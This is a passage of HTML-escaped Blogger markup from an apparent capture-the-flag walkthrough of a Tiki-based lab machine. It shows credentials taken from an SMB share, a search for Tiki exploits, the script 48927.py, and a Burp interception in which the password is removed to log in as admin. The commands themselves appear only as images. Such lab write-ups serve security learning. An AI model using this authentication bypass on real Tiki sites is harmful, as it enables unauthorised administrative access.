href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiTa0GGqIxa4IYmyfDQ5NTinhhHIDOfhOOq0xCN09NRpR-4xYgmt83An0Ja6YZ26Y-dK3Nh7bNABFjH0izwel59gDINzmDzMQsc5A8ck9j-oE6Vi0ZBbvOjiCURfCPYXBMeLRuChj7TIimVs2Gbea384MP3Ho_wPDN50Ap7AYE1biNl8du5Y5wEr0RZRQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;44&quot; data-original-width=&quot;343&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiTa0GGqIxa4IYmyfDQ5NTinhhHIDOfhOOq0xCN09NRpR-4xYgmt83An0Ja6YZ26Y-dK3Nh7bNABFjH0izwel59gDINzmDzMQsc5A8ck9j-oE6Vi0ZBbvOjiCURfCPYXBMeLRuChj7TIimVs2Gbea384MP3Ho_wPDN50Ap7AYE1biNl8du5Y5wEr0RZRQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiI1qhsQx-aMDULXjl40DVnyWBWuQLAQK4xPpq1sOkE0odS87agnSCqDvPYYh996zZqcW9v2Khz4cleOVhcsqAN9-01KcTPjhO8gU3ATZDHMqIM7tYx-ge05TFP2jRxiqsyoUzBtwoVdFm7gwZD0jeGQKm-Q6SHYbnHd5UdWqBHmcozAyDsa5WI0CQHww&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;541&quot; data-original-width=&quot;864&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiI1qhsQx-aMDULXjl40DVnyWBWuQLAQK4xPpq1sOkE0odS87agnSCqDvPYYh996zZqcW9v2Khz4cleOVhcsqAN9-01KcTPjhO8gU3ATZDHMqIM7tYx-ge05TFP2jRxiqsyoUzBtwoVdFm7gwZD0jeGQKm-Q6SHYbnHd5UdWqBHmcozAyDsa5WI0CQHww=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Connecting to share folder&lt;b&gt; Notes&lt;/b&gt; and dowloading content &lt;b&gt;Mail.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgtzLzzJFeJWgQd25Moy7v2BADsoFEx8wqJDzUr3DDIZLhF1rAj15ZmLFf-rbLmNzWLD7VrJUQXXjhU1omT2C8VxWuXKyYk4LHocFsAvQx9QnxvC827K9_6usZEuEybZrmsYE6xw1s3ZMbxQ8ql9VxWc4WEBj-_raKK1pyp33-gaZMke_0YH_p1lMTW_w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;284&quot; data-original-width=&quot;519&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgtzLzzJFeJWgQd25Moy7v2BADsoFEx8wqJDzUr3DDIZLhF1rAj15ZmLFf-rbLmNzWLD7VrJUQXXjhU1omT2C8VxWuXKyYk4LHocFsAvQx9QnxvC827K9_6usZEuEybZrmsYE6xw1s3ZMbxQ8ql9VxWc4WEBj-_raKK1pyp33-gaZMke_0YH_p1lMTW_w=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;Mail.txt&lt;/b&gt; we discover some credentials:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgh987bgmLC8zFoWa6t4qoqNi66hdez8dgPYxhEJ7k3N2OSjArfwzQSDx_2ye_FA5EJY8eS-zfIp7lGa_c9YvfsKDVT4t9gYy2VLRxQF1YC7wV3U1BD3-5H9otKrF6TOfLmmd5ESUS1WR_YgSj5bPZlwqP-OOXLhEj9PE4rPsrvbdkVxKnM5EmvuQgZuQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;240&quot; data-original-width=&quot;682&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgh987bgmLC8zFoWa6t4qoqNi66hdez8dgPYxhEJ7k3N2OSjArfwzQSDx_2ye_FA5EJY8eS-zfIp7lGa_c9YvfsKDVT4t9gYy2VLRxQF1YC7wV3U1BD3-5H9otKrF6TOfLmmd5ESUS1WR_YgSj5bPZlwqP-OOXLhEj9PE4rPsrvbdkVxKnM5EmvuQgZuQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However these credentials are not enough to SSH the target:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhqXpQqr5Udojmepx8HVH8aWnzqwo9yRVYQCp6E76TAyr9iJSJkvCKWqO5aDXnk4m_PFDlFT6dKoom-UFrPefwFqGkV_kmeMtiGZg6lICTxlSHYlZJ_66jW9shFNfi2AtUZcQvP-KBfk1SQIQIESB3kapAtNCRWxTzYDSULb2mN-fkRyjuloF05mlzaqg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;95&quot; data-original-width=&quot;409&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhqXpQqr5Udojmepx8HVH8aWnzqwo9yRVYQCp6E76TAyr9iJSJkvCKWqO5aDXnk4m_PFDlFT6dKoom-UFrPefwFqGkV_kmeMtiGZg6lICTxlSHYlZJ_66jW9shFNfi2AtUZcQvP-KBfk1SQIQIESB3kapAtNCRWxTzYDSULb2mN-fkRyjuloF05mlzaqg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Searching for exploits related with &lt;b&gt;Tiki&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhN_BQnpgpLh3_SgKpLHrOa864N_pdNpnZz-o7H42FaRj16aEF-THTLCUxZWzVhNaKarlCcKpFvb4QSp7gNQihBCWW0LVhIqovZMK23QhHiq_LvLfv9LMznU2wQNG1FTU5EIHbQlIJxpg0kl3Bf1_SlmLUc_kmYenq2Bq3E7h3g7LuHFp1mqYYTyHSAcw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;696&quot; data-original-width=&quot;926&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhN_BQnpgpLh3_SgKpLHrOa864N_pdNpnZz-o7H42FaRj16aEF-THTLCUxZWzVhNaKarlCcKpFvb4QSp7gNQihBCWW0LVhIqovZMK23QhHiq_LvLfv9LMznU2wQNG1FTU5EIHbQlIJxpg0kl3Bf1_SlmLUc_kmYenq2Bq3E7h3g7LuHFp1mqYYTyHSAcw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilwQ9_1tVwxyes9bG_UCL-Lai2uFaMQMiyIuJgkKyrag-2j9frWQe6-e8p-3E5DX7v8y8PN88_rrYFxNwm4un_YcAWq2yImGHXTLw__sdWJYkEHoYxxUyFrO-6kIJgVq-hJQ2by4QgxmEsk0my_IvHZYX1wo9hdwkc55_B2jrm2Hy5vtC2SqPvSJaiSw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;647&quot; data-original-width=&quot;275&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilwQ9_1tVwxyes9bG_UCL-Lai2uFaMQMiyIuJgkKyrag-2j9frWQe6-e8p-3E5DX7v8y8PN88_rrYFxNwm4un_YcAWq2yImGHXTLw__sdWJYkEHoYxxUyFrO-6kIJgVq-hJQ2by4QgxmEsk0my_IvHZYX1wo9hdwkc55_B2jrm2Hy5vtC2SqPvSJaiSw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;- Taking&amp;nbsp;&lt;/span&gt;the script &lt;b&gt;48927.py&lt;/b&gt;&amp;nbsp;and copying it to the local working folder:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjyP8KzvzJnoXSTE25j3bQbZBDAsdWzJTZjzSXGamBqg5FMIx2z7QCM8J_0JyCpHK2aRkiIclzWaOpvbZXo0MKY83-Bn-S42ZDoKPGDg4OHLL80OVzFZ4Ji4zQAjByR1TtC7l13EyQIQ5FH4KP4azZQRC-izp0bWsnMCddzB32OqbDbdhtZpheNFoFwQA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;57&quot; data-original-width=&quot;681&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjyP8KzvzJnoXSTE25j3bQbZBDAsdWzJTZjzSXGamBqg5FMIx2z7QCM8J_0JyCpHK2aRkiIclzWaOpvbZXo0MKY83-Bn-S42ZDoKPGDg4OHLL80OVzFZ4Ji4zQAjByR1TtC7l13EyQIQ5FH4KP4azZQRC-izp0bWsnMCddzB32OqbDbdhtZpheNFoFwQA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Launching the Python script&amp;nbsp;the answer gives us a couple of hints to exploit &lt;b&gt;Tiki&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgdmm63JzQrAFHndxW86MIfA-MVKLEP2abH5_pXohJwg4KPhYV0zqxj9yiyCXvJHCsfSOMA273PeS7CPnILqgcBkTwLBenAqn_MOkTbCLc_9LV-30_NFslGj9pAzb_JDOyn5PegoqW-lmP9Yy2u8Urvy_0WjEZ09UhLg5pw_AkkW0tl2nnNHPmiB4iZ8g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;521&quot; data-original-width=&quot;613&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgdmm63JzQrAFHndxW86MIfA-MVKLEP2abH5_pXohJwg4KPhYV0zqxj9yiyCXvJHCsfSOMA273PeS7CPnILqgcBkTwLBenAqn_MOkTbCLc_9LV-30_NFslGj9pAzb_JDOyn5PegoqW-lmP9Yy2u8Urvy_0WjEZ09UhLg5pw_AkkW0tl2nnNHPmiB4iZ8g=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So let&#39;s use &lt;b&gt;BurpSuite&lt;/b&gt; to take advantage of the exploit:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiaBy2jxY-3wzLJv0gGX65_5VVaUA4UQJl68MRaEh5UzjjTuPC_JDVZm5sXojI7eSzBysctWYdgD3aUS_fdEfyFjZJHH9tpmijVz1HhbY6cikP3nxsjD4-4Qzrc8HvgdgHbLdCtFqdD8_dyav5j_ZawYOjD7zNNsEiJPmnmHKuN9s10OQVu08ajCsoAUg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;376&quot; data-original-width=&quot;886&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiaBy2jxY-3wzLJv0gGX65_5VVaUA4UQJl68MRaEh5UzjjTuPC_JDVZm5sXojI7eSzBysctWYdgD3aUS_fdEfyFjZJHH9tpmijVz1HhbY6cikP3nxsjD4-4Qzrc8HvgdgHbLdCtFqdD8_dyav5j_ZawYOjD7zNNsEiJPmnmHKuN9s10OQVu08ajCsoAUg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Intercepting &lt;b&gt;Login&lt;/b&gt; credentials &lt;b&gt;admin:admin&lt;/b&gt; with &lt;b&gt;Burp&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhSJ6jR0AgWZsnCXr-G9ISpkoC2EBVWUZNbWWOoi7EDJ9U88WQ2yw-drSSbs__erCRWuExIV472BPCzYsGMLzWA1idcB7qahwGPqp4VZdARLcqrqi0ElI9DyNkMFCekU7uq50a98jP0E_iVe_pZc_XlDwb0ubilUuV8ilfU6sQXGJmlVGZGS97F2YmCNQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;509&quot; data-original-width=&quot;823&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhSJ6jR0AgWZsnCXr-G9ISpkoC2EBVWUZNbWWOoi7EDJ9U88WQ2yw-drSSbs__erCRWuExIV472BPCzYsGMLzWA1idcB7qahwGPqp4VZdARLcqrqi0ElI9DyNkMFCekU7uq50a98jP0E_iVe_pZc_XlDwb0ubilUuV8ilfU6sQXGJmlVGZGS97F2YmCNQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;- Removing password and&amp;nbsp;&lt;/span&gt;turning the interception off the result is that we are logged in as &lt;b&gt;admin&lt;/b&gt;:&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiA0K_TQcRv5E_v2blU7EnOSJBHJrH7tezjR2gjnNpVQOnrAAi4_LAR_sWgL3Z0fszt-y_4YQBroXRqJLVZKmPNr8qzyofBv13_aY9wGg6JYiGd2a7U6Bm3o8VRJvhEY526s8ZLflEGNdwQE0_5u5srjB2a2HTp0mwTZt4ABX_U1dmKe7aIhP7MLf_agQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;57&quot; data-original-width=&quot;182&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiA0K_TQcRv5E_v2blU7EnOSJBHJrH7tezjR2gjnNpVQOnrAAi4_LAR_sWgL3Z0fszt-y_4YQBroXRqJLVZKmPNr8qzyofBv13_aY9wGg6JYiGd2a7U6Bm3o8VRJvhEY526s8ZLflEGNdwQE0_5u5srjB2a2HTp0mwTZt4ABX_U1dmKe7aIhP7MLf_agQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: 